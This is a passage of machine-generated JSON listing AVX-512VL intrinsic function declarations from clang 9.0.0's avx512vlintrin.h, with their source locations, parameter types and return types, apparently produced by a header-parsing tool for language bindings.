"/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3932:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_permutex2var_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3940:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_permutex2var_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3949:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_permutex2var_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3955:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask2_permutex2var_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3963:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_permutex2var_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3971:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtepi8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3979:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepi8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3987:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3995:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4003:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtepi8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4011:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepi8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4019:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4027:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4035:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtepi32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4043:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepi32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4051:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4059:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4067:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtepi16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4075:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepi16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4083:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4091:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4099:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtepi16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4107:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepi16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4115:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4123:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4131:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtepu8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4140:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepu8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4148:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepu8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4156:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepu8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4164:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtepu8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4172:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepu8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4180:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepu8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4188:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepu8_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4196:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtepu32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4204:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepu32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4212:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepu32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4220:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepu32_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4228:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__X", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtepu16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4236:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepu16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4244:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepu16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4252:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepu16_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4260:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtepu16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4268:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepu16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4276:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepu16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4284:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepu16_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4292:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_rolv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4353:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_rolv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4359:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_rolv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4367:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_rolv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4375:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_rolv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4381:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_rolv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4389:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_rolv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4397:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_rolv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4403:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_rolv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4411:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_rolv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4419:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_rolv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4425:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_rolv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4433:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_sll_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4493:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sll_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4501:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_sll_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4509:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sll_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4517:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_slli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4525:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_slli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4533:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_slli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4541:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_slli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4549:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_sll_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4557:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sll_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:4565:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": 